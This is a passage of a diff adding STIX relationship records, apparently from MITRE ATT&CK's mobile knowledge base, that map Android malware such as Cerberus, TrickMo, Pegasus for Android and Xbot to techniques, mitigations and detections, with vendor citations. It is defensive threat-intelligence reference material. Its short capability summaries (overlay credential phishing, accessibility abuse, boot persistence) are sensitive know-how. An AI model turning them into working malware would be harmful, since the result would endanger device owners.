"relationship--bd351b17-e995-4528-bbea-e1138c51476a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.683Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) exfiltrates data from over 40 apps such as WeChat, Facebook, WhatsApp, Skype, and others.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--88ea5004-8bdb-4af4-a2dc-a8c56236ff03", + "type": "relationship", + "created": "2020-12-17T20:15:22.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.449Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s microphone.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--37123a8d-5c03-459c-bd0b-c17e2ee75a10", + "type": "relationship", + "created": "2020-06-26T15:32:25.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:32:25.074Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can update the malicious payload module on command.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6294e276-e4ac-4097-a5cd-3b81e0d4498f", + "type": "relationship", + "created": "2020-12-14T15:02:35.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.290Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has implemented functions in native code.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b81a284d-34ec-4e61-a073-bf6cd85e4c3f", + "created": "2020-10-29T19:01:13.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . 
Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:54:05.374Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) can prevent the user from interacting with the UI by using a carefully crafted \"call\" notification screen. This is coupled with overriding the `onUserLeaveHint()` callback method to spawn a new notification instance when the current one is dismissed. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f1e5d77-0054-4f8a-8e01-7c0318278a76", + "created": "2019-10-18T14:50:57.472Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain patches for known exploits.", + "modified": "2022-03-25T14:12:54.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d7e937d-7ea1-49cb-939c-5244815e51d7", + "created": "2017-12-14T16:46:06.044Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:03.296Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) uses HTTP for command and control.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27c8d474-f3f8-4a0e-a317-7e57b9de620c", + "type": "relationship", + "created": "2020-07-27T14:14:56.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." 
+ } + ], + "modified": "2020-08-10T22:18:20.777Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can obtain root access via a rooting trojan in its infection chain.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34a8a945-cc6c-474b-8db1-ffe8b5ecf99f", + "created": "2019-11-21T19:16:34.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:53.855Z", + "description": "[SimBad](https://attack.mitre.org/software/S0419) registers for the `BOOT_COMPLETED` and `USER_PRESENT` broadcast intents, which allows the software to perform actions after the device is booted and when the user is using the device, respectively.(Citation: CheckPoint SimBad 2019)", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7e8956e3-7d90-412d-a82f-d61e43239923", + "created": "2023-03-20T18:44:01.387Z", + "revoked": false, + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:01.387Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b356d405-f6b1-485b-bd35-236b9da766d2", + "type": "relationship", + "created": "2020-04-24T17:46:31.586Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-27T15:27:26.539Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can use the `MediaRecorder` class to record the screen when the targeted application is presented to the user, and can abuse accessibility features to record targeted applications to intercept transaction authorization numbers (TANs) and to scrape on-screen text.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--439d905b-1ad8-461a-ab0d-b2f426cb2c3a", + "created": "2023-03-20T18:53:35.012Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:35.012Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e68feca-083f-40ed-88d8-2b6a3935c949", + "created": "2023-01-18T19:12:11.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:53:38.271Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use the Android `CallScreeningService` to silently block incoming calls.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38634e49-f19e-41bc-bb6d-e711f0cabd91", + "created": "2020-10-29T19:21:23.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. 
Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:27.975Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can hide its icon and create a shortcut based on the C2 server response.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--93395e61-0d3e-4ea6-9c1b-08d4a04005a0", + "created": "2019-08-07T15:57:13.453Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Riltok](https://attack.mitre.org/software/S0403) can open a fake Google Play screen requesting bank card credentials and mimic the screen of relevant mobile banking apps to request user/bank card details.(Citation: Kaspersky Riltok June 2019)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b536f233-8c43-4671-b8e8-d72a4806946d", + "created": "2022-04-05T17:14:23.789Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:14:23.789Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--526ce88f-ee58-4a55-a1b2-b72e1b5971aa", + "created": "2022-04-01T16:52:36.974Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T16:52:36.974Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--82f04b1e-5371-4a6f-be06-411f0f43b483", + "target_ref": 
"attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--86e3c37c-1e4a-450c-850b-c80be8156fe3", + "type": "relationship", + "created": "2020-05-04T14:04:56.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.081Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) collects the device’s IMEI, carrier, mobile country code, and mobile network code.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--19df76ee-fa85-43cf-96ce-422d46f29a13", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:12:48.998Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) listens for the `BOOT_COMPLETED` broadcast intent in order to maintain persistence and activate its functionality at device boot time.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b838636-bfa4-4592-b72f-3044946b8187", + "created": "2020-09-14T14:13:45.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. 
Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:53:16.656Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can exfiltrate the device’s contact list.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1218ed50-bd44-4f37-baba-1aae998b5a1f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. 
Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:17:40.860Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) can remotely lock infected Android devices and ask for a ransom.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cccb708-b51b-4e71-94a1-78d6819eaac1", + "created": "2023-03-20T15:16:19.428Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:19.428Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--465b7a4a-32d5-475c-9fb9-6335c44fb0d1", + "created": "2022-04-05T19:48:31.354Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:48:31.354Z", + "relationship_type": "subtechnique-of", + 
"source_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a3f36e9e-e2f4-4745-a9a3-0d1231db116d", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.183Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can download executable code from the C2 server after the implant starts or after a specific command.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--535d2425-21aa-4fe5-ae6d-5b677f459020", + "created": "2022-03-28T19:41:37.162Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches for devices that were compromised at the supply chain level.", + "modified": "2022-03-28T19:41:37.162Z", + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0330db55-06e0-45a2-85a6-17617a37fdaf", + "created": "2022-04-06T13:57:49.186Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:49.186Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b", + "type": "relationship", + "created": "2020-12-24T22:04:27.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:27.914Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has looked for .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files on external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d66a3e5f-700e-40d0-b16a-bbb3306256c7", + "created": "2023-03-20T15:16:28.177Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:28.177Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576", + "type": "relationship", + "created": "2020-09-14T14:13:45.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ 